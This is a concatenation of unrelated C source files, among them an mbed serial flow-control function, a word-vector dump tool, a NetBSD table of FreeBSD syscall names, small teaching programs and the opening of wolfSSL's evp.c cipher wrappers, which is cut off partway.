txflow Pin for the txflow */ void serial_set_flow_control(serial_t *obj, FlowControl type, PinName rxflow, PinName txflow) { struct serial_s *obj_s = SERIAL_S(obj); UARTName uart_rts = (UARTName)pinmap_peripheral(rxflow, PinMap_UART_RTS); UARTName uart_cts = (UARTName)pinmap_peripheral(txflow, PinMap_UART_CTS); if (((UARTName)pinmap_merge(uart_rts, obj_s->uart) == (UARTName)NC) || ((UARTName)pinmap_merge(uart_cts, obj_s->uart) == (UARTName)NC)) { MBED_ASSERT(0); return; } int peripheral = (int)pinmap_merge(uart_rts, uart_cts); int tx_flow_function = (int)pinmap_find_function(txflow, PinMap_UART_CTS); int rx_flow_function = (int)pinmap_find_function(rxflow, PinMap_UART_RTS); const serial_fc_pinmap_t explicit_uart_fc_pinmap = {peripheral, txflow, tx_flow_function, rxflow, rx_flow_function}; SERIAL_SET_FC_DIRECT(obj, type, &explicit_uart_fc_pinmap); } #endif /* DEVICE_SERIAL_FC */ #endif /* DEVICE_SERIAL */
the_stack_data/126189.c
// Copyright 2013 Google Inc. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include <stdio.h> #include <string.h> #include <math.h> #include <malloc.h> const long long max_size = 2000; // max length of strings const long long N = 20; // number of closest words that will be shown const long long max_w = 50; // max length of vocabulary entries int loadModel(const char *filename ){ FILE *f; float len = 0.0, *M; char *word; long long nwords, size; f = fopen(filename, "rb"); if (f == NULL){ printf("Input file not found\n"); return -1; } fscanf(f, "%lld", &nwords); fscanf(f, "%lld", &size); word = (char *)malloc( max_w * sizeof(char)); M = (float *)malloc( (long long)size * sizeof(float)); for (int i=0; i<nwords; i++) { int j = 0; while(1) { word[j] = fgetc(f); if(feof(f) || (word[j] == ' ')) break; if((j<max_w) && (word[j] != '\n')) j++; } word[j] = 0; // use 0 to separate words printf("%s", word); for (j=0; j<size; j++) fread(&M[j], sizeof(float), 1, f); len = 0; for (j=0; j<size; j++) len += M[j] * M[j]; len = sqrt(len); for(j=0; j<size; j++) printf(" %.6f", M[j]/=len); printf("\n"); } fclose(f); free(word); free(M); return 0; } int main(int argc, char **argv) { char file_name[max_size]; if (argc < 2) { printf("Usage: ./getVector <FILE>\nwhere FILE contains word projections in the BINARY FORMAT\n"); return 0; } strcpy(file_name, argv[1]); if ( loadModel(file_name)!=0 ) printf("Cannot load model file, please retry."); return 0; }
the_stack_data/92325263.c
/* $NetBSD: freebsd_syscalls.c,v 1.27 1999/02/09 20:46:41 christos Exp $ */ /* * System call names. * * DO NOT EDIT-- this file is automatically generated. * created from NetBSD: syscalls.master,v 1.22 1999/02/09 20:19:13 christos Exp */ #if defined(_KERNEL) && !defined(_LKM) #include "opt_ktrace.h" #include "opt_nfsserver.h" #include "opt_sysv.h" #include "opt_compat_43.h" #include "fs_lfs.h" #include "fs_nfs.h" #include <sys/param.h> #include <sys/systm.h> #include <sys/signal.h> #include <sys/mount.h> #include <sys/syscallargs.h> #include <compat/freebsd/freebsd_syscallargs.h> #include <machine/freebsd_machdep.h> #endif /* _KERNEL && ! _LKM */ char *freebsd_syscallnames[] = { "syscall", /* 0 = syscall */ "exit", /* 1 = exit */ "fork", /* 2 = fork */ "read", /* 3 = read */ "write", /* 4 = write */ "open", /* 5 = open */ "close", /* 6 = close */ "wait4", /* 7 = wait4 */ "ocreat", /* 8 = ocreat */ "link", /* 9 = link */ "unlink", /* 10 = unlink */ "#11 (obsolete execv)", /* 11 = obsolete execv */ "chdir", /* 12 = chdir */ "fchdir", /* 13 = fchdir */ "mknod", /* 14 = mknod */ "chmod", /* 15 = chmod */ "chown", /* 16 = chown */ "break", /* 17 = break */ "getfsstat", /* 18 = getfsstat */ "olseek", /* 19 = olseek */ "getpid", /* 20 = getpid */ "mount", /* 21 = mount */ "unmount", /* 22 = unmount */ "setuid", /* 23 = setuid */ "getuid", /* 24 = getuid */ "geteuid", /* 25 = geteuid */ "ptrace", /* 26 = ptrace */ "recvmsg", /* 27 = recvmsg */ "sendmsg", /* 28 = sendmsg */ "recvfrom", /* 29 = recvfrom */ "accept", /* 30 = accept */ "getpeername", /* 31 = getpeername */ "getsockname", /* 32 = getsockname */ "access", /* 33 = access */ "chflags", /* 34 = chflags */ "fchflags", /* 35 = fchflags */ "sync", /* 36 = sync */ "kill", /* 37 = kill */ "stat43", /* 38 = stat43 */ "getppid", /* 39 = getppid */ "lstat43", /* 40 = lstat43 */ "dup", /* 41 = dup */ "pipe", /* 42 = pipe */ "getegid", /* 43 = getegid */ "profil", /* 44 = profil */ #ifdef KTRACE "ktrace", /* 45 = ktrace */ #else "#45 (unimplemented ktrace)", /* 45 = unimplemented ktrace */ #endif "sigaction", /* 46 = sigaction */ "getgid", /* 47 = getgid */ "sigprocmask", /* 48 = sigprocmask */ "__getlogin", /* 49 = __getlogin */ "setlogin", /* 50 = setlogin */ "acct", /* 51 = acct */ "sigpending", /* 52 = sigpending */ "sigaltstack", /* 53 = sigaltstack */ "ioctl", /* 54 = ioctl */ "oreboot", /* 55 = oreboot */ "revoke", /* 56 = revoke */ "symlink", /* 57 = symlink */ "readlink", /* 58 = readlink */ "execve", /* 59 = execve */ "umask", /* 60 = umask */ "chroot", /* 61 = chroot */ "fstat43", /* 62 = fstat43 */ "ogetkerninfo", /* 63 = ogetkerninfo */ "ogetpagesize", /* 64 = ogetpagesize */ "msync", /* 65 = msync */ "vfork", /* 66 = vfork */ "#67 (obsolete vread)", /* 67 = obsolete vread */ "#68 (obsolete vwrite)", /* 68 = obsolete vwrite */ "sbrk", /* 69 = sbrk */ "sstk", /* 70 = sstk */ "ommap", /* 71 = ommap */ "vadvise", /* 72 = vadvise */ "munmap", /* 73 = munmap */ "mprotect", /* 74 = mprotect */ "madvise", /* 75 = madvise */ "#76 (obsolete vhangup)", /* 76 = obsolete vhangup */ "#77 (obsolete vlimit)", /* 77 = obsolete vlimit */ "mincore", /* 78 = mincore */ "getgroups", /* 79 = getgroups */ "setgroups", /* 80 = setgroups */ "getpgrp", /* 81 = getpgrp */ "setpgid", /* 82 = setpgid */ "setitimer", /* 83 = setitimer */ "owait", /* 84 = owait */ "swapon", /* 85 = swapon */ "getitimer", /* 86 = getitimer */ "ogethostname", /* 87 = ogethostname */ "osethostname", /* 88 = osethostname */ "ogetdtablesize", /* 89 = ogetdtablesize */ "dup2", /* 90 = dup2 */ "#91 (unimplemented getdopt)", /* 91 = unimplemented getdopt */ "fcntl", /* 92 = fcntl */ "select", /* 93 = select */ "#94 (unimplemented setdopt)", /* 94 = unimplemented setdopt */ "fsync", /* 95 = fsync */ "setpriority", /* 96 = setpriority */ "socket", /* 97 = socket */ "connect", /* 98 = connect */ "oaccept", /* 99 = oaccept */ "getpriority", /* 100 = getpriority */ "osend", /* 101 = osend */ "orecv", /* 102 = orecv */ "sigreturn", /* 103 = sigreturn */ "bind", /* 104 = bind */ "setsockopt", /* 105 = setsockopt */ "listen", /* 106 = listen */ "#107 (obsolete vtimes)", /* 107 = obsolete vtimes */ "osigvec", /* 108 = osigvec */ "osigblock", /* 109 = osigblock */ "osigsetmask", /* 110 = osigsetmask */ "sigsuspend", /* 111 = sigsuspend */ "osigstack", /* 112 = osigstack */ "orecvmsg", /* 113 = orecvmsg */ "osendmsg", /* 114 = osendmsg */ #ifdef TRACE "vtrace", /* 115 = vtrace */ #else "#115 (obsolete vtrace)", /* 115 = obsolete vtrace */ #endif "gettimeofday", /* 116 = gettimeofday */ "getrusage", /* 117 = getrusage */ "getsockopt", /* 118 = getsockopt */ "#119 (obsolete resuba)", /* 119 = obsolete resuba */ "readv", /* 120 = readv */ "writev", /* 121 = writev */ "settimeofday", /* 122 = settimeofday */ "fchown", /* 123 = fchown */ "fchmod", /* 124 = fchmod */ "orecvfrom", /* 125 = orecvfrom */ "setreuid", /* 126 = setreuid */ "setregid", /* 127 = setregid */ "rename", /* 128 = rename */ "otruncate", /* 129 = otruncate */ "oftruncate", /* 130 = oftruncate */ "flock", /* 131 = flock */ "mkfifo", /* 132 = mkfifo */ "sendto", /* 133 = sendto */ "shutdown", /* 134 = shutdown */ "socketpair", /* 135 = socketpair */ "mkdir", /* 136 = mkdir */ "rmdir", /* 137 = rmdir */ "utimes", /* 138 = utimes */ "#139 (obsolete 4.2 sigreturn)", /* 139 = obsolete 4.2 sigreturn */ "adjtime", /* 140 = adjtime */ "ogetpeername", /* 141 = ogetpeername */ "ogethostid", /* 142 = ogethostid */ "osethostid", /* 143 = osethostid */ "ogetrlimit", /* 144 = ogetrlimit */ "osetrlimit", /* 145 = osetrlimit */ "okillpg", /* 146 = okillpg */ "setsid", /* 147 = setsid */ "quotactl", /* 148 = quotactl */ "oquota", /* 149 = oquota */ "ogetsockname", /* 150 = ogetsockname */ "#151 (unimplemented)", /* 151 = unimplemented */ "#152 (unimplemented)", /* 152 = unimplemented */ "#153 (unimplemented)", /* 153 = unimplemented */ "#154 (unimplemented)", /* 154 = unimplemented */ #if defined(NFS) || defined(NFSSERVER) "nfssvc", /* 155 = nfssvc */ #else "#155 (unimplemented)", /* 155 = unimplemented */ #endif "ogetdirentries", /* 156 = ogetdirentries */ "statfs", /* 157 = statfs */ "fstatfs", /* 158 = fstatfs */ "#159 (unimplemented)", /* 159 = unimplemented */ "#160 (unimplemented)", /* 160 = unimplemented */ #ifdef NFS "getfh", /* 161 = getfh */ #else "#161 (unimplemented getfh)", /* 161 = unimplemented getfh */ #endif "getdomainname", /* 162 = getdomainname */ "setdomainname", /* 163 = setdomainname */ "uname", /* 164 = uname */ "sysarch", /* 165 = sysarch */ "rtprio", /* 166 = rtprio */ "#167 (unimplemented)", /* 167 = unimplemented */ "#168 (unimplemented)", /* 168 = unimplemented */ #if defined(SYSVSEM) && !defined(alpha) "semsys", /* 169 = semsys */ #else "#169 (unimplemented 1.0 semsys)", /* 169 = unimplemented 1.0 semsys */ #endif #if defined(SYSVMSG) && !defined(alpha) "msgsys", /* 170 = msgsys */ #else "#170 (unimplemented 1.0 msgsys)", /* 170 = unimplemented 1.0 msgsys */ #endif #if defined(SYSVSHM) && !defined(alpha) "shmsys", /* 171 = shmsys */ #else "#171 (unimplemented 1.0 shmsys)", /* 171 = unimplemented 1.0 shmsys */ #endif "#172 (unimplemented)", /* 172 = unimplemented */ "#173 (unimplemented)", /* 173 = unimplemented */ "#174 (unimplemented)", /* 174 = unimplemented */ "#175 (unimplemented)", /* 175 = unimplemented */ "freebsd_ntp_adjtime", /* 176 = freebsd_ntp_adjtime */ "#177 (unimplemented)", /* 177 = unimplemented */ "#178 (unimplemented)", /* 178 = unimplemented */ "#179 (unimplemented)", /* 179 = unimplemented */ "#180 (unimplemented)", /* 180 = unimplemented */ "setgid", /* 181 = setgid */ "setegid", /* 182 = setegid */ "seteuid", /* 183 = seteuid */ #ifdef LFS "lfs_bmapv", /* 184 = lfs_bmapv */ "lfs_markv", /* 185 = lfs_markv */ "lfs_segclean", /* 186 = lfs_segclean */ "lfs_segwait", /* 187 = lfs_segwait */ #else "#184 (unimplemented)", /* 184 = unimplemented */ "#185 (unimplemented)", /* 185 = unimplemented */ "#186 (unimplemented)", /* 186 = unimplemented */ "#187 (unimplemented)", /* 187 = unimplemented */ #endif "stat", /* 188 = stat */ "fstat", /* 189 = fstat */ "lstat", /* 190 = lstat */ "pathconf", /* 191 = pathconf */ "fpathconf", /* 192 = fpathconf */ "#193 (unimplemented)", /* 193 = unimplemented */ "getrlimit", /* 194 = getrlimit */ "setrlimit", /* 195 = setrlimit */ "getdirentries", /* 196 = getdirentries */ "mmap", /* 197 = mmap */ "__syscall", /* 198 = __syscall */ "lseek", /* 199 = lseek */ "truncate", /* 200 = truncate */ "ftruncate", /* 201 = ftruncate */ "__sysctl", /* 202 = __sysctl */ "mlock", /* 203 = mlock */ "munlock", /* 204 = munlock */ #ifdef FREEBSD_BASED_ON_44LITE_R2 "undelete", /* 205 = undelete */ #else "#205 (unimplemented)", /* 205 = unimplemented */ #endif "futimes", /* 206 = futimes */ "getpgid", /* 207 = getpgid */ #if 0 "reboot", /* 208 = reboot */ #else "#208 (unimplemented newreboot)", /* 208 = unimplemented newreboot */ #endif "poll", /* 209 = poll */ "#210 (unimplemented)", /* 210 = unimplemented */ "#211 (unimplemented)", /* 211 = unimplemented */ "#212 (unimplemented)", /* 212 = unimplemented */ "#213 (unimplemented)", /* 213 = unimplemented */ "#214 (unimplemented)", /* 214 = unimplemented */ "#215 (unimplemented)", /* 215 = unimplemented */ "#216 (unimplemented)", /* 216 = unimplemented */ "#217 (unimplemented)", /* 217 = unimplemented */ "#218 (unimplemented)", /* 218 = unimplemented */ "#219 (unimplemented)", /* 219 = unimplemented */ #ifdef SYSVSEM "__semctl", /* 220 = __semctl */ "semget", /* 221 = semget */ "semop", /* 222 = semop */ "semconfig", /* 223 = semconfig */ #else "#220 (unimplemented semctl)", /* 220 = unimplemented semctl */ "#221 (unimplemented semget)", /* 221 = unimplemented semget */ "#222 (unimplemented semop)", /* 222 = unimplemented semop */ "#223 (unimplemented semconfig)", /* 223 = unimplemented semconfig */ #endif #ifdef SYSVMSG "msgctl", /* 224 = msgctl */ "msgget", /* 225 = msgget */ "msgsnd", /* 226 = msgsnd */ "msgrcv", /* 227 = msgrcv */ #else "#224 (unimplemented msgctl)", /* 224 = unimplemented msgctl */ "#225 (unimplemented msgget)", /* 225 = unimplemented msgget */ "#226 (unimplemented msgsnd)", /* 226 = unimplemented msgsnd */ "#227 (unimplemented msgrcv)", /* 227 = unimplemented msgrcv */ #endif #ifdef SYSVSHM "shmat", /* 228 = shmat */ "shmctl", /* 229 = shmctl */ "shmdt", /* 230 = shmdt */ "shmget", /* 231 = shmget */ #else "#228 (unimplemented shmat)", /* 228 = unimplemented shmat */ "#229 (unimplemented shmctl)", /* 229 = unimplemented shmctl */ "#230 (unimplemented shmdt)", /* 230 = unimplemented shmdt */ "#231 (unimplemented shmget)", /* 231 = unimplemented shmget */ #endif "clock_gettime", /* 232 = clock_gettime */ "clock_settime", /* 233 = clock_settime */ "clock_getres", /* 234 = clock_getres */ "#235 (unimplemented timer_create)", /* 235 = unimplemented timer_create */ "#236 (unimplemented timer_delete)", /* 236 = unimplemented timer_delete */ "#237 (unimplemented timer_settime)", /* 237 = unimplemented timer_settime */ "#238 (unimplemented timer_gettime)", /* 238 = unimplemented timer_gettime */ "#239 (unimplemented timer_getoverrun)", /* 239 = unimplemented timer_getoverrun */ "nanosleep", /* 240 = nanosleep */ "#241 (unimplemented)", /* 241 = unimplemented */ "#242 (unimplemented)", /* 242 = unimplemented */ "#243 (unimplemented)", /* 243 = unimplemented */ "#244 (unimplemented)", /* 244 = unimplemented */ "#245 (unimplemented)", /* 245 = unimplemented */ "#246 (unimplemented)", /* 246 = unimplemented */ "#247 (unimplemented)", /* 247 = unimplemented */ "#248 (unimplemented)", /* 248 = unimplemented */ "#249 (unimplemented)", /* 249 = unimplemented */ "#250 (unimplemented minherit)", /* 250 = unimplemented minherit */ "#251 (unimplemented rfork)", /* 251 = unimplemented rfork */ "#252 (unimplemented openbsd_poll)", /* 252 = unimplemented openbsd_poll */ "issetugid", /* 253 = issetugid */ "lchown", /* 254 = lchown */ "#255 (unimplemented)", /* 255 = unimplemented */ "#256 (unimplemented)", /* 256 = unimplemented */ "#257 (unimplemented)", /* 257 = unimplemented */ "#258 (unimplemented)", /* 258 = unimplemented */ "#259 (unimplemented)", /* 259 = unimplemented */ "#260 (unimplemented)", /* 260 = unimplemented */ "#261 (unimplemented)", /* 261 = unimplemented */ "#262 (unimplemented)", /* 262 = unimplemented */ "#263 (unimplemented)", /* 263 = unimplemented */ "#264 (unimplemented)", /* 264 = unimplemented */ "#265 (unimplemented)", /* 265 = unimplemented */ "#266 (unimplemented)", /* 266 = unimplemented */ "#267 (unimplemented)", /* 267 = unimplemented */ "#268 (unimplemented)", /* 268 = unimplemented */ "#269 (unimplemented)", /* 269 = unimplemented */ "#270 (unimplemented)", /* 270 = unimplemented */ "#271 (unimplemented)", /* 271 = unimplemented */ "getdents", /* 272 = getdents */ "#273 (unimplemented)", /* 273 = unimplemented */ "lchmod", /* 274 = lchmod */ "netbsd_lchown", /* 275 = netbsd_lchown */ "lutimes", /* 276 = lutimes */ "__msync13", /* 277 = __msync13 */ "__stat13", /* 278 = __stat13 */ "__fstat13", /* 279 = __fstat13 */ "__lstat13", /* 280 = __lstat13 */ "#281 (unimplemented)", /* 281 = unimplemented */ "#282 (unimplemented)", /* 282 = unimplemented */ "#283 (unimplemented)", /* 283 = unimplemented */ "#284 (unimplemented)", /* 284 = unimplemented */ "#285 (unimplemented)", /* 285 = unimplemented */ "#286 (unimplemented)", /* 286 = unimplemented */ "#287 (unimplemented)", /* 287 = unimplemented */ "#288 (unimplemented)", /* 288 = unimplemented */ "#289 (unimplemented)", /* 289 = unimplemented */ "#290 (unimplemented)", /* 290 = unimplemented */ "#291 (unimplemented)", /* 291 = unimplemented */ "#292 (unimplemented)", /* 292 = unimplemented */ "#293 (unimplemented)", /* 293 = unimplemented */ "#294 (unimplemented)", /* 294 = unimplemented */ "#295 (unimplemented)", /* 295 = unimplemented */ "#296 (unimplemented)", /* 296 = unimplemented */ "#297 (unimplemented)", /* 297 = unimplemented */ "#298 (unimplemented)", /* 298 = unimplemented */ "#299 (unimplemented)", /* 299 = unimplemented */ "#300 (unimplemented modnext)", /* 300 = unimplemented modnext */ "#301 (unimplemented modstat)", /* 301 = unimplemented modstat */ "#302 (unimplemented modfnext)", /* 302 = unimplemented modfnext */ "#303 (unimplemented modfind)", /* 303 = unimplemented modfind */ "#304 (unimplemented kldload)", /* 304 = unimplemented kldload */ "#305 (unimplemented kldunload)", /* 305 = unimplemented kldunload */ "#306 (unimplemented kldfind)", /* 306 = unimplemented kldfind */ "#307 (unimplemented kldnext)", /* 307 = unimplemented kldnext */ "#308 (unimplemented kldstat)", /* 308 = unimplemented kldstat */ "#309 (unimplemented kldfirstmod)", /* 309 = unimplemented kldfirstmod */ "#310 (unimplemented getsid)", /* 310 = unimplemented getsid */ "#311 (unimplemented setresuid)", /* 311 = unimplemented setresuid */ "#312 (unimplemented setresgid)", /* 312 = unimplemented setresgid */ "#313 (unimplemented signanosleep)", /* 313 = unimplemented signanosleep */ "#314 (unimplemented aio_return)", /* 314 = unimplemented aio_return */ "#315 (unimplemented aio_suspend)", /* 315 = unimplemented aio_suspend */ "#316 (unimplemented aio_cancel)", /* 316 = unimplemented aio_cancel */ "#317 (unimplemented aio_error)", /* 317 = unimplemented aio_error */ "#318 (unimplemented aio_read)", /* 318 = unimplemented aio_read */ "#319 (unimplemented aio_write)", /* 319 = unimplemented aio_write */ "#320 (unimplemented lio_listio)", /* 320 = unimplemented lio_listio */ "#321 (unimplemented yield)", /* 321 = unimplemented yield */ "#322 (unimplemented thr_sleep)", /* 322 = unimplemented thr_sleep */ "#323 (unimplemented thr_wakeup)", /* 323 = unimplemented thr_wakeup */ "#324 (unimplemented mlockall)", /* 324 = unimplemented mlockall */ "#325 (unimplemented munlockall)", /* 325 = unimplemented munlockall */ "#326 (unimplemented __getcwd)", /* 326 = unimplemented __getcwd */ "#327 (unimplemented sched_setparam)", /* 327 = unimplemented sched_setparam */ "#328 (unimplemented sched_getparam)", /* 328 = unimplemented sched_getparam */ "#329 (unimplemented sched_setscheduler)", /* 329 = unimplemented sched_setscheduler */ "#330 (unimplemented sched_getscheduler)", /* 330 = unimplemented sched_getscheduler */ "#331 (unimplemented sched_yield)", /* 331 = unimplemented sched_yield */ "#332 (unimplemented sched_get_priority_max)", /* 332 = unimplemented sched_get_priority_max */ "#333 (unimplemented sched_get_priority_min)", /* 333 = unimplemented sched_get_priority_min */ "#334 (unimplemented sched_rr_get_interval)", /* 334 = unimplemented sched_rr_get_interval */ "#335 (unimplemented utrace)", /* 335 = unimplemented utrace */ "#336 (unimplemented sendfile)", /* 336 = unimplemented sendfile */ "#337 (unimplemented kldsym)", /* 337 = unimplemented kldsym */ };
the_stack_data/232956667.c
int main (void) { int i = 4, j = 4, k; __CPROVER_assume(3<=k && k<=4); while (j < 10) { do { i >>= 1; j >>= 1; } while ((k < 10)); } return 0; }
the_stack_data/90761497.c
#include <stdio.h> #include <stdlib.h> #define LEN 32 // 256 bits int main() { unsigned char *key = (unsigned char *)malloc(sizeof(unsigned char) * LEN); FILE *random = fopen("/dev/urandom", "r"); fread(key, sizeof(unsigned char) * LEN, 1, random); fclose(random); printf("k = "); for (int i = 0; i < LEN; i++) printf("%.2x", key[i]); printf("\n"); return 0; }
the_stack_data/126702917.c
#include <stdio.h> #include <math.h> #define LIMIT 100000000 unsigned int find_num_divisors(unsigned int number); int main() { unsigned int inc = 1; unsigned int triangle = 0; while (triangle < LIMIT) { triangle += inc; inc += 1; if (triangle < 10000000) { continue; } unsigned int num_divisors = find_num_divisors(triangle); if (num_divisors > 500) { printf("triangle: %u, divisors: %u\n", triangle, num_divisors); return 0; } } printf("Couldn't find number with more than 500 divisors up to %u.\n", LIMIT); return 0; } /** * Fails for number == 1. * * @param number * @return */ unsigned int find_num_divisors(unsigned int number) { unsigned int num_divisors = 2; // 1 and itself unsigned int step = 2; unsigned int start = 3; if (number % 2 == 0) { step = 1; start = 2; } unsigned int i; for (i = start; i < sqrt(number); i += step) { if (number % i == 0) { num_divisors += 2; // both i and number/i are divisors } } if (1.0 * i == sqrt(number)) { num_divisors += 1; // add only once } return num_divisors; }
the_stack_data/100141201.c
#include <stdio.h> // biblioteca padrão de entrada e saída e de definições de constantes, variáveis e tipos. #include <stdlib.h> // biblioteca padrão de alocação de memória, controle de processos e conversões, entre outros. #include <ctype.h> // biblioteca para classificar caracteres ASCII int main () { int valor = 1555; int *endereco_valor; int valor_no_endereco; endereco_valor = &valor; printf("\nO endereço é &: %i", endereco_valor); valor_no_endereco = *endereco_valor; printf("\nO valor no endereço é *: %i", valor_no_endereco); return 0; };
the_stack_data/93886934.c
#include <stdio.h> int BSearch(int a[], int x, int low, int high) { int mid; if (low > high) return -1; mid = (low + high) / 2; if (x == a[mid]) return mid; else if (x < a[mid]) return BSearch(a, x, low, mid - 1); else return BSearch(a, x, mid + 1, high); } int main() { int a[] = {1, 2, 5, 7, 9, 11, 45, 46}; int x = 49; int bn; bn = BSearch(a, x, 0, 7); if (bn == -1) printf("x不在数组中\n"); else printf("x在a[%d]\n", bn); }
the_stack_data/100140189.c
/* evp.c * * Copyright (C) 2006-2017 wolfSSL Inc. * * This file is part of wolfSSL. * * wolfSSL is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * wolfSSL is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1335, USA */ #if !defined(WOLFSSL_EVP_INCLUDED) #warning evp.c does not need to be compiled seperatly from ssl.c #else static unsigned int cipherType(const WOLFSSL_EVP_CIPHER *cipher); #ifdef WOLFSSL_SIGNAL WOLFSSL_API int wolfSSL_EVP_EncryptInit(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, const unsigned char* key, const unsigned char* iv) { return wolfSSL_EVP_CipherInit(ctx, type, (byte*)key, (byte*)iv, 1); } WOLFSSL_API int wolfSSL_EVP_EncryptInit_ex(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, WOLFSSL_ENGINE *impl, const unsigned char* key, const unsigned char* iv) { (void) impl; return wolfSSL_EVP_CipherInit(ctx, type, (byte*)key, (byte*)iv, 1); } WOLFSSL_API int wolfSSL_EVP_DecryptInit(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, const unsigned char* key, const unsigned char* iv) { WOLFSSL_ENTER("wolfSSL_EVP_CipherInit"); return wolfSSL_EVP_CipherInit(ctx, type, (byte*)key, (byte*)iv, 0); } WOLFSSL_API int wolfSSL_EVP_DecryptInit_ex(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, WOLFSSL_ENGINE *impl, const unsigned char* key, const unsigned char* iv) { (void) impl; WOLFSSL_ENTER("wolfSSL_EVP_DecryptInit"); return wolfSSL_EVP_CipherInit(ctx, type, (byte*)key, (byte*)iv, 0); } #else /* WOLFSSL_SIGNAL */ WOLFSSL_API int wolfSSL_EVP_EncryptInit(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, unsigned char* key, unsigned char* iv) { return wolfSSL_EVP_CipherInit(ctx, type, key, iv, 1); } WOLFSSL_API int wolfSSL_EVP_EncryptInit_ex(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, WOLFSSL_ENGINE *impl, unsigned char* key, unsigned char* iv) { (void) impl; return wolfSSL_EVP_CipherInit(ctx, type, key, iv, 1); } WOLFSSL_API int wolfSSL_EVP_DecryptInit(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, unsigned char* key, unsigned char* iv) { WOLFSSL_ENTER("wolfSSL_EVP_CipherInit"); return wolfSSL_EVP_CipherInit(ctx, type, key, iv, 0); } WOLFSSL_API int wolfSSL_EVP_DecryptInit_ex(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, WOLFSSL_ENGINE *impl, unsigned char* key, unsigned char* iv) { (void) impl; WOLFSSL_ENTER("wolfSSL_EVP_DecryptInit"); return wolfSSL_EVP_CipherInit(ctx, type, key, iv, 0); } #endif /* WOLFSSL_SIGNAL */ WOLFSSL_API WOLFSSL_EVP_CIPHER_CTX *wolfSSL_EVP_CIPHER_CTX_new(void) { WOLFSSL_EVP_CIPHER_CTX *ctx = (WOLFSSL_EVP_CIPHER_CTX*)XMALLOC(sizeof *ctx, NULL, DYNAMIC_TYPE_TMP_BUFFER); if (ctx){ WOLFSSL_ENTER("wolfSSL_EVP_CIPHER_CTX_new"); wolfSSL_EVP_CIPHER_CTX_init(ctx); } return ctx; } WOLFSSL_API void wolfSSL_EVP_CIPHER_CTX_free(WOLFSSL_EVP_CIPHER_CTX *ctx) { if (ctx) { WOLFSSL_ENTER("wolfSSL_EVP_CIPHER_CTX_free"); wolfSSL_EVP_CIPHER_CTX_cleanup(ctx); XFREE(ctx, NULL, DYNAMIC_TYPE_TMP_BUFFER); } } WOLFSSL_API unsigned long wolfSSL_EVP_CIPHER_CTX_mode(const WOLFSSL_EVP_CIPHER_CTX *ctx) { if (ctx == NULL) return 0; return ctx->flags & WOLFSSL_EVP_CIPH_MODE; } WOLFSSL_API int wolfSSL_EVP_EncryptFinal(WOLFSSL_EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl) { if (ctx && ctx->enc){ WOLFSSL_ENTER("wolfSSL_EVP_EncryptFinal"); return wolfSSL_EVP_CipherFinal(ctx, out, outl); } else return 0; } WOLFSSL_API int wolfSSL_EVP_CipherInit_ex(WOLFSSL_EVP_CIPHER_CTX* ctx, const WOLFSSL_EVP_CIPHER* type, WOLFSSL_ENGINE *impl, unsigned char* key, unsigned char* iv, int enc) { (void)impl; return wolfSSL_EVP_CipherInit(ctx, type, key, iv, enc); } WOLFSSL_API int wolfSSL_EVP_EncryptFinal_ex(WOLFSSL_EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl) { if (ctx && ctx->enc){ WOLFSSL_ENTER("wolfSSL_EVP_EncryptFinal_ex"); return wolfSSL_EVP_CipherFinal(ctx, out, outl); } else return 0; } WOLFSSL_API int wolfSSL_EVP_DecryptFinal(WOLFSSL_EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl) { if (ctx && ctx->enc) return 0; else{ WOLFSSL_ENTER("wolfSSL_EVP_DecryptFinal"); return wolfSSL_EVP_CipherFinal(ctx, out, outl); } } WOLFSSL_API int wolfSSL_EVP_DecryptFinal_ex(WOLFSSL_EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl) { if (ctx && ctx->enc) return 0; else{ WOLFSSL_ENTER("wolfSSL_EVP_CipherFinal_ex"); return wolfSSL_EVP_CipherFinal(ctx, out, outl); } } WOLFSSL_API int wolfSSL_EVP_DigestInit_ex(WOLFSSL_EVP_MD_CTX* ctx, const WOLFSSL_EVP_MD* type, WOLFSSL_ENGINE *impl) { (void) impl; WOLFSSL_ENTER("wolfSSL_EVP_DigestInit_ex"); return wolfSSL_EVP_DigestInit(ctx, type); } #ifdef DEBUG_WOLFSSL_EVP #define PRINT_BUF(b, sz) { int i; for(i=0; i<(sz); i++){printf("%02x(%c),", (b)[i], (b)[i]); if((i+1)%8==0)printf("\n");}} #else #define PRINT_BUF(b, sz) #endif static int fillBuff(WOLFSSL_EVP_CIPHER_CTX *ctx, const unsigned char *in, int sz) { int fill; if (sz > 0) { if ((sz+ctx->bufUsed) > ctx->block_size) { fill = ctx->block_size - ctx->bufUsed; } else { fill = sz; } XMEMCPY(&(ctx->buf[ctx->bufUsed]), in, fill); ctx->bufUsed += fill; return fill; } else return 0; } static int evpCipherBlock(WOLFSSL_EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, int inl) { int ret = 0; switch (ctx->cipherType) { #if !defined(NO_AES) && defined(HAVE_AES_CBC) case AES_128_CBC_TYPE: case 